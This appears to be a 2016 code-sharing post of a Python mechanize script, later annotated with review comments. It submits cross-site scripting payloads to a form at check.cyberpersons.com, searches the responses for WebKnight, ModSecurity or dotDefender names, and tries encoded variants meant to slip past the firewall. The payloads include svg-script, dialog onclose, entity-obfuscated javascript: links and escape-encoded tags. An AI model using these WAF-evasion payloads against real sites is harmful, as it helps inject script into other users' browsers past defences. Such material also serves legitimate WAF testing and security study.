Description: Use Python to detect a Web Application Firewall and bypass it!
Submitted on December 18, 2016 at 08:31 AM

Section 1 (Python)

import mechanize as mec

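# Probe step: submit one script-bearing value to the test form, print the page
# that comes back, and look for a WAF product name in it.
# The single-argument print(...) form is used throughout this block because it
# behaves the same under the Python 2 print statement and Python 3.
maliciousRequest = mec.Browser()

formName = 'waf'

# NOTE(review): plain http:// - the request and the response can be read or
# altered in transit, so the classification below is only as reliable as the
# network path.
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")

maliciousRequest.select_form(formName)

# Value placed in the form's 'data' field for the probe request.
crossSiteScriptingPayLoad = "<svg><script>alert&grave;1&grave;<p>"

maliciousRequest.form['data'] = crossSiteScriptingPayLoad

# NOTE(review): mechanize presumably raises on HTTP error statuses here, in
# which case a block page served with such a status would stop the script
# before the classification below runs - confirm against the library version.
maliciousRequest.submit()
response = maliciousRequest.response().read()

print(response)

# Classification is a plain substring search of the returned body for three
# product names. The original chain tested 'Mod_Security' twice; the second
# test could never be reached and has been removed.
if 'WebKnight' in response:
    print("Firewall detected: WebKnight")
elif 'Mod_Security' in response:
    print("Firewall detected: Mod Security")
elif 'dotDefender' in response:
    print("Firewall detected: Dot Defender")
else:
    # Only means none of the three names appeared in the body. A product that
    # filters silently, or uses a block page without its name, is not ruled out.
    print("No Firewall Present")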



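# Second stage: submit three further script-bearing values to the same form
# and, for each one, report whether a known WAF product name appears in the
# returned page. Unlike the first probe, the response body is not printed.
# The single-argument print(...) form behaves the same under the Python 2
# print statement and Python 3.
listofPayloads = ['<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="&#1;javascript:alert(1)">CLICK ME<a>']

# Loop-invariant, so assigned once instead of on every iteration.
formName = 'waf'

for payLoads in listofPayloads:

    # Each value is sent from a freshly constructed Browser object.
    maliciousRequest = mec.Browser()

    # NOTE(review): plain http:// - traffic can be read or altered in transit.
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")

    maliciousRequest.select_form(formName)

    maliciousRequest.form['data'] = payLoads

    maliciousRequest.submit()

    response = maliciousRequest.response().read()

    print("---------------------------------------------------")

    # Substring search of the body for three product names. The original
    # chain tested 'Mod_Security' twice; the unreachable repeat is removed.
    if 'WebKnight' in response:
        print("Firewall detected: WebKnight")
    elif 'Mod_Security' in response:
        print("Firewall detected: Mod Security")
    elif 'dotDefender' in response:
        print("Firewall detected: Dot Defender")
    else:
        # No match only shows that none of the three names was in the body;
        # it does not establish that the value was accepted unfiltered or
        # that no filtering product sits in front of the application.
        print("No Firewall Present")

    print("---------------------------------------------------")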


# Third stage: submit three spellings of a harmless <b> tag and print each
# returned page between separator lines so the echoed form can be inspected.
# What is actually transmitted depends on how Python reads each literal:
#   '&lt;b&gt;'       - sent as written (HTML entities, no Python escapes).
#   '\u003cb\u003e'   - in a Python 2 byte-string literal the \u sequences are
#                       not interpreted, so the backslash text is sent as is;
#                       under Python 3 the literal resolves to '<b>'.
#   '\x3cb\x3e'       - resolved by the interpreter to '<b>' before it ever
#                       reaches the form, on both Python 2 and 3.
listofPayloads = ['&lt;b&gt;','\u003cb\u003e','\x3cb\x3e']

formName = 'waf'
separator = "---------------------------------------------------"

for payLoads in listofPayloads:
    # One freshly constructed Browser object per submitted value.
    maliciousRequest = mec.Browser()
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_form(formName)
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submit()

    response = maliciousRequest.response().read()

    # No classification here: the body is shown verbatim for manual review.
    print(separator)
    print(response)
    print(separator)